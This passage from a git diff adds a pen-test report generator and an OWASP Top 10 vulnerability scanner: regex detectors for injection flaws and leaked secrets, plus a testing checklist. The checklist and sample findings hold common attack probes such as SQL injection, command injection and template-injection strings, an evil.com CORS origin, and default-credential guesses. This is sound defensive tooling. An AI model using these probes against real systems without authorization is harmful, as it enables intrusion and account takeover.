" + "Address low-severity findings during regular maintenance.") + + return "\n".join(lines) + + def _scope_section(self) -> str: + scope = self.metadata.get("scope", "Full application security assessment") + exclusions = self.metadata.get("exclusions", "None specified") + test_type = self.metadata.get("test_type", "Gray box") + lines = [ + "## Scope", + "", + f"- **In Scope**: {scope}", + f"- **Exclusions**: {exclusions}", + f"- **Test Type**: {test_type}", + ] + return "\n".join(lines) + + def _findings_table(self) -> str: + lines = [ + "## Findings Overview", + "", + "| # | Severity | CVSS | Title | Category |", + "|---|----------|------|-------|----------|", + ] + for i, f in enumerate(self.findings, 1): + sev_badge = f.severity.upper() + lines.append(f"| {i} | {sev_badge} | {f.cvss_score} | {f.title} | {f.category} |") + return "\n".join(lines) + + def _detailed_findings(self) -> str: + lines = ["## Detailed Findings"] + for i, f in enumerate(self.findings, 1): + lines.append("") + lines.append(f"### {i}. 
{f.title}") + lines.append("") + lines.append(f"**Severity:** {f.severity.upper()} | **CVSS:** {f.cvss_score}" + + (f" | **Vector:** `{f.cvss_vector}`" if f.cvss_vector else "")) + lines.append(f"**Category:** {f.category}") + lines.append("") + lines.append("#### Description") + lines.append("") + lines.append(f"{f.description}") + lines.append("") + lines.append("#### Evidence") + lines.append("") + lines.append("```") + lines.append(f"{f.evidence}") + lines.append("```") + lines.append("") + lines.append("#### Impact") + lines.append("") + lines.append(f"{f.impact}") + lines.append("") + lines.append("#### Remediation") + lines.append("") + lines.append(f"{f.remediation}") + if f.references: + lines.append("") + lines.append("#### References") + lines.append("") + for ref in f.references: + lines.append(f"- {ref}") + return "\n".join(lines) + + def _remediation_matrix(self) -> str: + lines = [ + "## Remediation Priority Matrix", + "", + "Prioritize remediation based on severity and effort:", + "", + "| # | Finding | Severity | Effort | Priority |", + "|---|---------|----------|--------|----------|", + ] + for i, f in enumerate(self.findings, 1): + priority = self._compute_priority(f) + lines.append(f"| {i} | {f.title} | {f.severity.upper()} | {f.effort} | {priority} |") + + lines.append("") + lines.append("**Priority Key:** P1 = Fix immediately, P2 = Fix this sprint, " + "P3 = Fix this quarter, P4 = Backlog") + return "\n".join(lines) + + def _methodology_section(self) -> str: + lines = [ + "## Methodology", + "", + "Testing followed the OWASP Testing Guide v4.2 and PTES (Penetration Testing Execution Standard):", + "", + "1. **Reconnaissance** — Mapped attack surface, identified endpoints and technologies", + "2. **Vulnerability Discovery** — Automated scanning + manual testing for OWASP Top 10", + "3. **Exploitation** — Validated findings with proof-of-concept (non-destructive)", + "4. 
**Post-Exploitation** — Assessed lateral movement and data access potential", + "5. **Reporting** — Documented findings with evidence and remediation guidance", + ] + return "\n".join(lines) + + def _appendix(self) -> str: + lines = [ + "## Appendix", + "", + "### CVSS Scoring Reference", + "", + "| Score Range | Severity |", + "|-------------|----------|", + "| 9.0 - 10.0 | Critical |", + "| 7.0 - 8.9 | High |", + "| 4.0 - 6.9 | Medium |", + "| 0.1 - 3.9 | Low |", + "| 0.0 | Informational |", + "", + "### Disclaimer", + "", + "This report represents a point-in-time assessment. New vulnerabilities may emerge after " + "the testing period. Regular security assessments are recommended.", + "", + f"---\n\n*Report generated on {self.generated_at}*", + ] + return "\n".join(lines) + + def _calculate_risk_score(self) -> float: + """Calculate overall risk score (0-10) based on findings.""" + if not self.findings: + return 0.0 + # Weighted by severity + weights = {"critical": 10, "high": 7, "medium": 4, "low": 1.5, "info": 0.5} + total_weight = sum(weights.get(f.severity, 0) for f in self.findings) + # Normalize: cap at 10, scale based on number of findings + score = min(10.0, total_weight / max(len(self.findings) * 0.5, 1)) + return round(score, 1) + + def _risk_level(self) -> str: + """Return risk level string based on score.""" + score = self._calculate_risk_score() + if score >= 9.0: + return "CRITICAL" + elif score >= 7.0: + return "HIGH" + elif score >= 4.0: + return "MEDIUM" + elif score > 0: + return "LOW" + return "NONE" + + def _compute_priority(self, finding: Finding) -> str: + """Compute remediation priority from severity and effort.""" + sev = SEVERITY_ORDER.get(finding.severity, 0) + effort_map = {"low": 3, "medium": 2, "high": 1} + effort_val = effort_map.get(finding.effort, 2) + score = sev * effort_val + if score >= 12: + return "P1" + elif score >= 8: + return "P2" + elif score >= 4: + return "P3" + return "P4" + + def _remediation_priority_list(self) -> 
List[Dict]: + """Return ordered list of remediation priorities for JSON output.""" + result = [] + for f in self.findings: + result.append({ + "title": f.title, + "severity": f.severity, + "effort": f.effort, + "priority": self._compute_priority(f), + "remediation": f.remediation, + }) + return result + + +def load_findings(path: str) -> tuple: + """Load findings from a JSON file.""" + try: + content = Path(path).read_text(encoding="utf-8") + data = json.loads(content) + except (OSError, json.JSONDecodeError) as e: + print(f"Error loading findings: {e}", file=sys.stderr) + sys.exit(1) + + # Support both list-of-findings and object-with-metadata formats + metadata = {} + findings_data = data + if isinstance(data, dict): + metadata = data.get("metadata", {}) + findings_data = data.get("findings", []) + + findings = [] + for item in findings_data: + findings.append(Finding( + title=item.get("title", "Untitled Finding"), + severity=item.get("severity", "medium"), + cvss_score=float(item.get("cvss_score", 0.0)), + category=item.get("category", "Uncategorized"), + description=item.get("description", ""), + evidence=item.get("evidence", "No evidence provided"), + impact=item.get("impact", ""), + remediation=item.get("remediation", ""), + cvss_vector=item.get("cvss_vector", ""), + references=item.get("references", []), + effort=item.get("effort", "medium"), + )) + return findings, metadata + + +def generate_sample_findings() -> str: + """Generate a sample findings JSON for reference.""" + sample = [ + { + "title": "SQL Injection in Login Endpoint", + "severity": "critical", + "cvss_score": 9.8, + "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "category": "A03:2021 - Injection", + "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.", + "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token", + "impact": "Full database access, 
authentication bypass, potential remote code execution.", + "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.", + "references": ["https://cwe.mitre.org/data/definitions/89.html"], + "effort": "low" + }, + { + "title": "Stored XSS in User Profile", + "severity": "high", + "cvss_score": 7.1, + "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", + "category": "A03:2021 - Injection", + "description": "The user profile 'bio' field does not sanitize HTML input.", + "evidence": "Submitted in bio field.\nVisiting the profile page executes the payload.", + "impact": "Session hijacking, account takeover, phishing via stored malicious content.", + "remediation": "Sanitize all user input with DOMPurify. Implement Content-Security-Policy.", + "references": ["https://cwe.mitre.org/data/definitions/79.html"], + "effort": "low" + } + ] + return json.dumps(sample, indent=2) + + +def main(): + parser = argparse.ArgumentParser( + description="Pen Test Report Generator — Generate professional penetration testing reports from structured findings.", + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=""" +Examples: + %(prog)s --findings findings.json --format md --output report.md + %(prog)s --findings findings.json --format json + %(prog)s --sample > sample_findings.json + +Findings JSON format: + A JSON array of objects with: title, severity, cvss_score, category, + description, evidence, impact, remediation, cvss_vector, references, effort. + + Use --sample to generate a template. 
+ """, + ) + parser.add_argument("--findings", metavar="FILE", + help="Path to findings JSON file") + parser.add_argument("--format", choices=["md", "json"], default="md", + help="Output format (default: md)") + parser.add_argument("--output", metavar="FILE", + help="Output file path (default: stdout)") + parser.add_argument("--json", action="store_true", dest="json_shortcut", + help="Shortcut for --format json") + parser.add_argument("--sample", action="store_true", + help="Print sample findings JSON and exit") + args = parser.parse_args() + + if args.sample: + print(generate_sample_findings()) + return + + if not args.findings: + parser.error("--findings is required (use --sample to generate a template)") + + if not Path(args.findings).exists(): + print(f"Error: File not found: {args.findings}", file=sys.stderr) + sys.exit(1) + + output_format = "json" if args.json_shortcut else args.format + findings, metadata = load_findings(args.findings) + + if not findings: + print("No findings loaded. Check the JSON file format.", file=sys.stderr) + sys.exit(1) + + generator = PentestReportGenerator(findings=findings, metadata=metadata) + + if output_format == "json": + result = json.dumps(generator.generate_json(), indent=2) + else: + result = generator.generate_markdown() + + if args.output: + Path(args.output).write_text(result, encoding="utf-8") + print(f"Report written to {args.output}") + else: + print(result) + + +if __name__ == "__main__": + main() diff --git a/engineering-team/security-pen-testing/scripts/vulnerability_scanner.py b/engineering-team/security-pen-testing/scripts/vulnerability_scanner.py new file mode 100644 index 0000000..e63fbe2 --- /dev/null +++ b/engineering-team/security-pen-testing/scripts/vulnerability_scanner.py @@ -0,0 +1,545 @@ +#!/usr/bin/env python3 +""" +Vulnerability Scanner - Generate OWASP Top 10 security checklists and scan for common patterns. 
+ +Table of Contents: + VulnerabilityScanner - Main class for vulnerability scanning + __init__ - Initialize with target type and scope + generate_checklist - Generate OWASP Top 10 checklist for target + scan_source - Scan source directory for vulnerability patterns + _scan_file - Scan individual file for regex patterns + _get_owasp_checks - Return OWASP checks for target type + main() - CLI entry point + +Usage: + python vulnerability_scanner.py --target web --scope full + python vulnerability_scanner.py --target api --scope quick --json + python vulnerability_scanner.py --target web --source /path/to/code --scope full +""" + +import argparse +import json +import os +import re +import sys +from dataclasses import dataclass, asdict, field +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional + + +@dataclass +class CheckItem: + """A single check item in the OWASP checklist.""" + owasp_id: str + owasp_category: str + check_id: str + title: str + description: str + test_procedure: str + severity: str # critical, high, medium, low, info + applicable_targets: List[str] = field(default_factory=list) + status: str = "pending" # pending, pass, fail, na + + +@dataclass +class SourceFinding: + """A vulnerability pattern found in source code.""" + rule_id: str + title: str + severity: str + owasp_category: str + file_path: str + line_number: int + code_snippet: str + recommendation: str + + +class VulnerabilityScanner: + """Generate OWASP Top 10 checklists and scan source code for vulnerability patterns.""" + + SCAN_EXTENSIONS = { + ".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", + ".rb", ".php", ".cs", ".rs", ".html", ".vue", ".svelte", + } + + SKIP_DIRS = { + "node_modules", ".git", "__pycache__", ".venv", "venv", + "vendor", "dist", "build", ".next", "target", + } + + def __init__(self, target: str = "web", scope: str = "full", source: Optional[str] = None): + self.target = target + self.scope = scope + self.source = source 
+ + def generate_checklist(self) -> List[CheckItem]: + """Generate OWASP Top 10 checklist for the given target and scope.""" + all_checks = self._get_owasp_checks() + filtered = [] + for check in all_checks: + if self.target not in check.applicable_targets and "all" not in check.applicable_targets: + continue + if self.scope == "quick" and check.severity in ("low", "info"): + continue + filtered.append(check) + return filtered + + def scan_source(self, path: str) -> List[SourceFinding]: + """Scan source directory for common vulnerability patterns.""" + findings = [] + source_path = Path(path) + if not source_path.exists(): + return findings + + for root, dirs, files in os.walk(source_path): + dirs[:] = [d for d in dirs if d not in self.SKIP_DIRS] + for fname in files: + fpath = Path(root) / fname + if fpath.suffix in self.SCAN_EXTENSIONS: + findings.extend(self._scan_file(fpath)) + return findings + + def _scan_file(self, file_path: Path) -> List[SourceFinding]: + """Scan a single file for vulnerability patterns.""" + findings = [] + try: + content = file_path.read_text(encoding="utf-8", errors="ignore") + except (OSError, PermissionError): + return findings + + patterns = [ + { + "rule_id": "SQLI-001", + "title": "Potential SQL Injection (string concatenation)", + "severity": "critical", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''(?:execute|query|cursor\.execute)\s*\(\s*(?:f["\']|["\'].*%s|["\'].*\+\s*\w+|["\'].*\.format)''', + "recommendation": "Use parameterized queries or prepared statements instead of string concatenation.", + "extensions": {".py", ".js", ".ts", ".java", ".rb", ".php"}, + }, + { + "rule_id": "SQLI-002", + "title": "Potential SQL Injection (template literal)", + "severity": "critical", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''(?:query|execute|raw)\s*\(\s*`[^`]*\$\{''', + "recommendation": "Use parameterized queries. 
Never interpolate user input into SQL strings.", + "extensions": {".js", ".ts", ".jsx", ".tsx"}, + }, + { + "rule_id": "XSS-001", + "title": "Potential DOM-based XSS (innerHTML)", + "severity": "high", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''\.innerHTML\s*=\s*(?!['"][^'"]*['"])''', + "recommendation": "Use textContent or a sanitization library (DOMPurify) instead of innerHTML.", + "extensions": {".js", ".ts", ".jsx", ".tsx", ".html", ".vue", ".svelte"}, + }, + { + "rule_id": "XSS-002", + "title": "React dangerouslySetInnerHTML usage", + "severity": "high", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''dangerouslySetInnerHTML''', + "recommendation": "Sanitize HTML with DOMPurify before using dangerouslySetInnerHTML.", + "extensions": {".jsx", ".tsx", ".js", ".ts"}, + }, + { + "rule_id": "CMDI-001", + "title": "Potential Command Injection (shell=True)", + "severity": "critical", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''subprocess\.\w+\(.*shell\s*=\s*True''', + "recommendation": "Avoid shell=True. Use subprocess with a list of arguments instead.", + "extensions": {".py"}, + }, + { + "rule_id": "CMDI-002", + "title": "Potential Command Injection (eval/exec)", + "severity": "critical", + "owasp_category": "A03:2021 - Injection", + "pattern": r'''(?:^|\s)(?:eval|exec)\s*\((?!.*(?:#\s*nosec|NOSONAR))''', + "recommendation": "Never use eval() or exec() with untrusted input. 
Use ast.literal_eval() for data parsing.", + "extensions": {".py", ".js", ".ts"}, + }, + { + "rule_id": "SEC-001", + "title": "Hardcoded Secret or API Key", + "severity": "critical", + "owasp_category": "A02:2021 - Cryptographic Failures", + "pattern": r'''(?i)(?:api[_-]?key|secret[_-]?key|password|passwd|token)\s*[:=]\s*['\"][a-zA-Z0-9+/=]{16,}['\"]''', + "recommendation": "Move secrets to environment variables or a secrets manager (Vault, AWS Secrets Manager).", + "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", ".rb", ".php"}, + }, + { + "rule_id": "SEC-002", + "title": "AWS Access Key ID detected", + "severity": "critical", + "owasp_category": "A02:2021 - Cryptographic Failures", + "pattern": r'''AKIA[0-9A-Z]{16}''', + "recommendation": "Remove the AWS key immediately. Rotate the credential and use IAM roles or environment variables.", + "extensions": None, # scan all files + }, + { + "rule_id": "CRYPTO-001", + "title": "Weak hashing algorithm (MD5/SHA1)", + "severity": "high", + "owasp_category": "A02:2021 - Cryptographic Failures", + "pattern": r'''(?:md5|sha1)\s*\(''', + "recommendation": "Use bcrypt, scrypt, or argon2 for passwords. Use SHA-256+ for integrity checks.", + "extensions": {".py", ".js", ".ts", ".java", ".go", ".rb", ".php"}, + }, + { + "rule_id": "SSRF-001", + "title": "Potential SSRF (user-controlled URL in HTTP request)", + "severity": "high", + "owasp_category": "A10:2021 - SSRF", + "pattern": r'''(?:requests\.get|fetch|axios|http\.get|urllib\.request\.urlopen)\s*\(\s*(?:request\.|req\.|params|args|input|user)''', + "recommendation": "Validate and allowlist URLs before making outbound requests. 
Block internal IPs.", + "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go"}, + }, + { + "rule_id": "PATH-001", + "title": "Potential Path Traversal", + "severity": "high", + "owasp_category": "A01:2021 - Broken Access Control", + "pattern": r'''(?:open|readFile|readFileSync|Path\.join)\s*\(.*(?:request\.|req\.|params|args|input|user)''', + "recommendation": "Sanitize file paths. Use os.path.basename() and validate against an allowlist.", + "extensions": {".py", ".js", ".ts", ".java", ".go"}, + }, + { + "rule_id": "DESER-001", + "title": "Unsafe Deserialization (pickle/yaml.load)", + "severity": "critical", + "owasp_category": "A08:2021 - Software and Data Integrity Failures", + "pattern": r'''(?:pickle\.load|yaml\.load\s*\([^)]*\)\s*(?!.*Loader\s*=\s*yaml\.SafeLoader))''', + "recommendation": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data.", + "extensions": {".py"}, + }, + { + "rule_id": "AUTH-001", + "title": "JWT with hardcoded secret", + "severity": "critical", + "owasp_category": "A07:2021 - Identification and Authentication Failures", + "pattern": r'''jwt\.(?:encode|sign)\s*\([^)]*['\"][a-zA-Z0-9]{8,}['\"]''', + "recommendation": "Load JWT secrets from environment variables. 
Use RS256 with key pairs for production.", + "extensions": {".py", ".js", ".ts"}, + }, + ] + + lines = content.split("\n") + for i, line in enumerate(lines, 1): + for pat in patterns: + exts = pat.get("extensions") + if exts and file_path.suffix not in exts: + continue + if re.search(pat["pattern"], line): + findings.append(SourceFinding( + rule_id=pat["rule_id"], + title=pat["title"], + severity=pat["severity"], + owasp_category=pat["owasp_category"], + file_path=str(file_path), + line_number=i, + code_snippet=line.strip()[:200], + recommendation=pat["recommendation"], + )) + return findings + + def _get_owasp_checks(self) -> List[CheckItem]: + """Return comprehensive OWASP Top 10 checklist items.""" + checks = [ + # A01: Broken Access Control + CheckItem("A01", "Broken Access Control", "A01-01", + "Horizontal Privilege Escalation", + "Verify users cannot access other users' resources by changing IDs.", + "Change resource IDs in API requests (e.g., /users/123 → /users/124). Expect 403.", + "critical", ["web", "api", "all"]), + CheckItem("A01", "Broken Access Control", "A01-02", + "Vertical Privilege Escalation", + "Verify regular users cannot access admin endpoints.", + "Authenticate as regular user, request admin endpoints. Expect 403.", + "critical", ["web", "api", "all"]), + CheckItem("A01", "Broken Access Control", "A01-03", + "CORS Misconfiguration", + "Verify CORS policy does not allow arbitrary origins.", + "Send request with Origin: https://evil.com. Check Access-Control-Allow-Origin.", + "high", ["web", "api"]), + CheckItem("A01", "Broken Access Control", "A01-04", + "Forced Browsing", + "Check for unprotected admin or debug pages.", + "Request /admin, /debug, /api/admin, /.env, /swagger. Expect 403 or 404.", + "high", ["web", "all"]), + CheckItem("A01", "Broken Access Control", "A01-05", + "Directory Listing", + "Verify directory listing is disabled on the web server.", + "Request directory paths without index file. 
Should not list contents.", + "medium", ["web"]), + + # A02: Cryptographic Failures + CheckItem("A02", "Cryptographic Failures", "A02-01", + "TLS Version Check", + "Ensure TLS 1.2+ is enforced. Reject TLS 1.0/1.1.", + "Run: nmap --script ssl-enum-ciphers -p 443 target.com", + "high", ["web", "api", "all"]), + CheckItem("A02", "Cryptographic Failures", "A02-02", + "Password Hashing Algorithm", + "Verify passwords use bcrypt/scrypt/argon2 with adequate cost.", + "Review authentication code for hashing implementation.", + "critical", ["web", "api", "all"]), + CheckItem("A02", "Cryptographic Failures", "A02-03", + "Sensitive Data in URLs", + "Check for tokens, passwords, or PII in query parameters.", + "Review access logs and URL patterns for sensitive query params.", + "high", ["web", "api"]), + CheckItem("A02", "Cryptographic Failures", "A02-04", + "HSTS Header", + "Verify Strict-Transport-Security header is present.", + "Check response headers for HSTS with max-age >= 31536000.", + "medium", ["web"]), + + # A03: Injection + CheckItem("A03", "Injection", "A03-01", + "SQL Injection", + "Test input fields for SQL injection vulnerabilities.", + "Submit ' OR 1=1-- in input fields. Check for errors or unexpected behavior.", + "critical", ["web", "api", "all"]), + CheckItem("A03", "Injection", "A03-02", + "XSS (Cross-Site Scripting)", + "Test for reflected, stored, and DOM-based XSS.", + "Submit in input fields. Check if rendered.", + "high", ["web", "all"]), + CheckItem("A03", "Injection", "A03-03", + "Command Injection", + "Test for OS command injection in input fields.", + "Submit ; whoami in fields that may trigger system commands.", + "critical", ["web", "api"]), + CheckItem("A03", "Injection", "A03-04", + "Template Injection", + "Test for server-side template injection.", + "Submit {{7*7}} and ${7*7} in input fields. 
Check for 49 in response.", + "high", ["web", "api"]), + CheckItem("A03", "Injection", "A03-05", + "NoSQL Injection", + "Test for NoSQL injection in JSON inputs.", + "Submit {\"$gt\": \"\"} in JSON fields. Check for data leakage.", + "high", ["api"]), + + # A04: Insecure Design + CheckItem("A04", "Insecure Design", "A04-01", + "Rate Limiting on Authentication", + "Verify rate limiting exists on login and password reset endpoints.", + "Send 50+ rapid login requests. Expect 429 after threshold.", + "high", ["web", "api", "all"]), + CheckItem("A04", "Insecure Design", "A04-02", + "Business Logic Abuse", + "Test for business logic flaws (negative quantities, state manipulation).", + "Try negative values, skip steps in workflows, manipulate client-side calculations.", + "high", ["web", "api"]), + CheckItem("A04", "Insecure Design", "A04-03", + "Account Lockout", + "Verify account lockout after repeated failed login attempts.", + "Submit 10+ failed login attempts. Check for lockout or CAPTCHA.", + "medium", ["web", "api"]), + + # A05: Security Misconfiguration + CheckItem("A05", "Security Misconfiguration", "A05-01", + "Default Credentials", + "Check for default credentials on admin panels and services.", + "Try admin:admin, root:root, admin:password on all login forms.", + "critical", ["web", "api", "all"]), + CheckItem("A05", "Security Misconfiguration", "A05-02", + "Debug Mode in Production", + "Verify debug mode is disabled in production.", + "Trigger errors and check for stack traces, debug info, or verbose errors.", + "high", ["web", "api", "all"]), + CheckItem("A05", "Security Misconfiguration", "A05-03", + "Security Headers", + "Verify all security headers are present and properly configured.", + "Check for CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.", + "medium", ["web"]), + CheckItem("A05", "Security Misconfiguration", "A05-04", + "Unnecessary HTTP Methods", + "Verify only required HTTP methods are enabled.", + "Send OPTIONS request. 
Check for TRACE, DELETE on public endpoints.", + "low", ["web", "api"]), + + # A06: Vulnerable Components + CheckItem("A06", "Vulnerable and Outdated Components", "A06-01", + "Dependency CVE Audit", + "Scan all dependencies for known CVEs.", + "Run npm audit, pip audit, govulncheck, or bundle audit.", + "high", ["web", "api", "mobile", "all"]), + CheckItem("A06", "Vulnerable and Outdated Components", "A06-02", + "End-of-Life Framework Check", + "Verify no EOL frameworks or languages are in use.", + "Check framework versions against vendor EOL dates.", + "medium", ["web", "api", "all"]), + + # A07: Authentication Failures + CheckItem("A07", "Identification and Authentication Failures", "A07-01", + "Brute Force Protection", + "Verify brute force protection on authentication endpoints.", + "Send 100 rapid login attempts. Expect blocking after threshold.", + "high", ["web", "api", "all"]), + CheckItem("A07", "Identification and Authentication Failures", "A07-02", + "Session Management", + "Verify sessions are properly managed (HttpOnly, Secure, SameSite).", + "Check cookie flags: HttpOnly, Secure, SameSite=Strict|Lax.", + "high", ["web"]), + CheckItem("A07", "Identification and Authentication Failures", "A07-03", + "Session Invalidation on Logout", + "Verify sessions are invalidated on logout.", + "Logout, then replay the session cookie. Should receive 401.", + "high", ["web", "api"]), + CheckItem("A07", "Identification and Authentication Failures", "A07-04", + "Username Enumeration", + "Check for username enumeration via error messages.", + "Submit valid and invalid usernames. 
Error messages should be identical.", + "medium", ["web", "api"]), + + # A08: Data Integrity + CheckItem("A08", "Software and Data Integrity Failures", "A08-01", + "Unsafe Deserialization", + "Check for unsafe deserialization of user input.", + "Review code for pickle.load(), yaml.load(), Java ObjectInputStream.", + "critical", ["web", "api"]), + CheckItem("A08", "Software and Data Integrity Failures", "A08-02", + "Subresource Integrity", + "Verify SRI hashes on CDN-loaded scripts and stylesheets.", + "Check